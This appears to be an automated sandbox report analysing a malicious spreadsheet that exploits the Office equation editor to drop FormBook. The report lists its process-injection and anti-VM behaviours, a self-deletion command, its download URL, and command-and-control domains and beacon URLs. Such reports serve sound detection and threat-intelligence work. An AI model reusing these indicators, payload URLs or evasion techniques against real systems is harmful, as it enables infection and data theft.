          Source: explorer.exe, 00000008.00000000.500434774.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.500434774.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.485172151.000000000449C000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0v
          Source: explorer.exe, 00000008.00000000.485467727.0000000004513000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Co>
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.487676458.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000008.00000000.500756480.00000000045D4000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000006.00000002.477878823.0000000002470000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 7_2_009326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00A026F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.thvsjwjvy.icu
          Source: C:\Windows\explorer.exeDomain query: www.carlsbadbeachwear.com
          Source: C:\Windows\explorer.exeDomain query: www.biotechfla.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.91.1.126 80
          Source: C:\Windows\explorer.exeNetwork Connect: 47.91.170.222 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeDomain query: www.359326.com
          Source: C:\Windows\explorer.exeDomain query: www.absolutalibertas.com
          Source: C:\Windows\explorer.exeDomain query: www.crownfoamus.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 830000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000008.00000000.487921894.0000000000750000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682273930.0000000003010000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.514291085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513518262.0000000000330000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.513195165.0000000000130000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.503060559.000000000968B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.478266756.0000000003429000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681191038.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681249318.0000000000150000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.681218220.0000000000120000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.494897496.000000000968B000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion21Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 483666 Sample: COAU7229898130.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 17 other signatures 2->56 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 44 2->15         started        process3 dnsIp4 44 103.133.106.199, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->74 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$COAU7229898130.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Tries to detect virtualization through RDTSC time measurements 17->46 48 Injects a PE file into a foreign processes 17->48 20 vbc.exe 17->20         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 20->58 60 Maps a DLL or memory area into another process 20->60 62 Sample uses process hollowing technique 20->62 64 Queues an APC in another process (thread injection) 20->64 23 explorer.exe 20->23 injected process11 dnsIp12 38 tiaozhuan.zhuanye301.cn 154.91.1.126, 49166, 80 HKBN-AS-APHKBroadbandNetworkLtdHK Seychelles 23->38 40 www.thvsjwjvy.icu 47.91.170.222, 49167, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 23->40 42 7 other IPs or domains 23->42 66 System process connects to network (likely due to code injection or exploit) 23->66 27 svchost.exe 23->27         started        signatures13 process14 signatures15 68 Modifies the context of a thread in another process (thread injection) 27->68 70 Maps a DLL or memory area into another process 27->70 72 Tries to detect virtualization through RDTSC time measurements 27->72 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          COAU7229898130.xlsx36%VirustotalBrowse
          COAU7229898130.xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.thvsjwjvy.icu/imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz0%Avira URL Cloudsafe
          http://www.biotechfla.com/imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz0%Avira URL Cloudsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://java.sun.com0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          www.southerngiggle.com/imi7/0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz0%Avira URL Cloudsafe
          http://103.133.106.199/rbi/vbc.exe100%Avira URL Cloudmalware
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          https://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXD0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.thvsjwjvy.icu
          47.91.170.222
          truetrue
            unknown
            biotechfla.com
            34.102.136.180
            truefalse
              unknown
              absolutalibertas.com
              192.0.78.25
              truetrue
                unknown
                tiaozhuan.zhuanye301.cn
                154.91.1.126
                truetrue
                  unknown
                  www.359326.com
                  unknown
                  unknowntrue
                    unknown
                    www.absolutalibertas.com
                    unknown
                    unknowntrue
                      unknown
                      www.carlsbadbeachwear.com
                      unknown
                      unknowntrue
                        unknown
                        www.crownfoamus.com
                        unknown
                        unknowntrue
                          unknown
                          www.biotechfla.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.thvsjwjvy.icu/imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvztrue
                            • Avira URL Cloud: safe
                            unknown
                            http://www.biotechfla.com/imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvzfalse
                            • Avira URL Cloud: safe
                            unknown
                            www.southerngiggle.com/imi7/true
                            • Avira URL Cloud: safe
                            low
                            http://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvztrue
                            • Avira URL Cloud: safe
                            unknown
                            http://103.133.106.199/rbi/vbc.exetrue
                            • Avira URL Cloud: malware
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.windows.com/pctv.explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpfalse
                              high
                              http://investor.msn.comexplorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpfalse
                                high
                                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpfalse
                                  high
                                  http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpfalse
                                    high
                                    http://treyresearch.netexplorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpfalse
                                      high
                                      http://java.sun.comexplorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.icra.org/vocabulary/.explorer.exe, 00000008.00000000.497796354.0000000002CC7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmpfalse
                                        high
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.day.com/dam/1.0EBBD63B0.emf.0.drfalse
                                            high
                                            http://investor.msn.com/explorer.exe, 00000008.00000000.497564635.0000000002AE0000.00000002.00020000.sdmpfalse
                                              high
                                              http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.502611514.0000000008428000.00000004.00000001.sdmpfalse
                                                high
                                                http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.485777397.0000000004650000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.%s.comPAexplorer.exe, 00000008.00000000.488209976.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000009.00000002.682320675.0000000004410000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                low
                                                http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpfalse
                                                  high
                                                  https://support.mozilla.orgexplorer.exe, 00000008.00000000.544799470.0000000000255000.00000004.00000020.sdmpfalse
                                                    high
                                                    http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.491485736.0000000003E50000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    low
                                                    https://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDsvchost.exe, 00000009.00000002.682029665.0000000001062000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    103.133.106.199
                                                    unknownViet Nam
                                                    135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                    192.0.78.25
                                                    absolutalibertas.comUnited States
                                                    2635AUTOMATTICUStrue
                                                    34.102.136.180
                                                    biotechfla.comUnited States
                                                    15169GOOGLEUSfalse
                                                    154.91.1.126
                                                    tiaozhuan.zhuanye301.cnSeychelles
                                                    10103HKBN-AS-APHKBroadbandNetworkLtdHKtrue
                                                    47.91.170.222
                                                    www.thvsjwjvy.icuUnited States
                                                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:483666
                                                    Start date:15.09.2021
                                                    Start time:11:12:10
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 10m 24s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:COAU7229898130.xlsx
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:2
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winXLSX@9/27@6/5
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 20.4% (good quality ratio 19.7%)
                                                    • Quality average: 70.6%
                                                    • Quality standard deviation: 28.2%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .xlsx
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    11:12:43API Interceptor89x Sleep call for process: EQNEDT32.EXE modified
                                                    11:12:48API Interceptor61x Sleep call for process: vbc.exe modified
                                                    11:13:09API Interceptor230x Sleep call for process: svchost.exe modified
                                                    11:13:58API Interceptor1x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    103.133.106.199ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/msn/vbc.exe
                                                    PO-PT. Hextar-Sept21.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/sun/vbc.exe
                                                    PO211000386.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/regasm/vbc.exe
                                                    FRT_INV_LCIM0037223_1.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/hkcmd/kernel.exe
                                                    RFQ_Hua Joo Success Industry.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/ibm/vbc.exe
                                                    Arrival Notice_VSL TAICHUNG.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/hsbc/vbc.exe
                                                    Shipping Documents_2670767360.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/swiss/vbc.exe
                                                    ASN_SHIPPING DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/boi/vbc.exe
                                                    MV TAICHUNG.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/pnb/vbc.exe
                                                    COAU7229898130.xlsxGet hashmaliciousBrowse
                                                    • 103.133.106.199/icici/vbc.exe
                                                    192.0.78.25PO7420.exeGet hashmaliciousBrowse
                                                    • www.welcometoeverywhere.com/c28h/?y480=DiQ0RJdZZo5O6Njv3t8JizC/3RsAORr+JzU/VqYrClhFedoBYi/d4/NnMzE/b507UBHa&B48dJ=8pKPZleh
                                                    Additional Order Qty 2.xlsxGet hashmaliciousBrowse
                                                    • www.adventuresofdatinginnyc.com/b6a4/?xv=Ttx0Y4G80pL&d4GTW8EP=fgCHNvWOhrp4ynbMjNwBl+blUweyUikFPVRE0gMjc6TvoWeiB6YExzEBQ2h9bXaZG4xMCQ==
                                                    REQUEST_FOR_QUOTE_00989_RFQ.exeGet hashmaliciousBrowse
                                                    • www.andreasvalor.com/a6hg/?B6AhlF=mxotnpu0CH1HRny&4hk0=4o02t1ysqzG41fLrhiRkTQgIFN2WNvmjT74ZiQtREu0bZm9L8CuUbTMNg6NpTGJIv0PS
                                                    PO 270745.exeGet hashmaliciousBrowse
                                                    • www.itownfwl.com/imm8/?q6A=yRTF7MMn5725J/YYQM/Tn7VXsUXm/ePoGGHduJahCTf649OPd5ZYXrwX8TsDBJawIOaW&UrQL=9r5Hcxc0IHhLQbV
                                                    PKLBpffwsn.exeGet hashmaliciousBrowse
                                                    • www.moneysavingkitchen.com/imi7/?0rNdUrth=ze3UBOhlJHW3rkbdAnx+iTSFJGqa/nSyxy/Mwj4FXHliL9MoI3qyLh6s/Wc+IfGpa0Qa&eFN=9rUTmdSpY8
                                                    RFQ.docGet hashmaliciousBrowse
                                                    • www.suerickard.com/t5n8/?ojqTkJv0=95FRAi8hccY0Ne4p/NBAJQHqWE5baZpvstaIVeT6uGkr+TksFmHXQ9c9qdWd/C6L6JBArw==&Bv=E8l0d6D
                                                    purchase order # 3061552371.exeGet hashmaliciousBrowse
                                                    • www.itownfwl.com/imm8/?t2JxC=MnHT2BEh_&e0=yRTF7MMn5725J/YYQM/Tn7VXsUXm/ePoGGHduJahCTf649OPd5ZYXrwX8TsDBJawIOaW
                                                    PO4318.exeGet hashmaliciousBrowse
                                                    • www.welcometoeverywhere.com/c28h/?bH2xj=-ZfDvv28O&4hu0Ud=DiQ0RJdZZo5O6Njv3t8JizC/3RsAORr+JzU/VqYrClhFedoBYi/d4/NnMwoFY4YAX2mLetQ7Qg==
                                                    nH6Xzm2J8t.exeGet hashmaliciousBrowse
                                                    • www.spiritunbrokentheblog.net/fa0p/?6lox=4hSLtNzXrd0Pc&2d04=z+cI/Imav1sKhJ1XLTjicrdE8/wGlbehbjm7G/wH/UIOt3WQkrD4vvjwYxLlvT9Fiphj
                                                    #7091.pdf.exeGet hashmaliciousBrowse
                                                    • www.brihastie.com/gm9w/?kZR=SBgXj&5j=RavOhUnFTbSFnpPe0wIns3vygYXrf4RBqHPndCVZsvSSpluv/b9AyJiv3E8bfY3QDoiB
                                                    Urgent Order.exeGet hashmaliciousBrowse
                                                    • www.guncelekspres.com/odse/?W64D_=CPuxulrAxXxx2qnXL+3z0uf0eDt8disyANKWZnBdZ3Bhb/BFz6bzJPykPx1eOsfB7Aqff6gsmA==&cVkD=-ZVdOf9pC8tdZJ
                                                    hornMX9rFW.exeGet hashmaliciousBrowse
                                                    • www.unicafegraz.com/hisp/?utUPMn=mT-DZ&YR=JQD+WvZJHwuN60zPR44AvaKhDyKgWnzZOfwibQedJmhujysVPt9ayqWONCAwWwge5l8K
                                                    Swift-scan-MGT.exeGet hashmaliciousBrowse
                                                    • www.walkingodslight.com/h85m/?9r5pzR=fsOiUBYE7Y4Kp799QbeQwZCTO9ficUIU5z080A7LizoC+0gD2wZ9zbSKNwudxTreRkNs&o6z=zHbXunW8sHzXTf
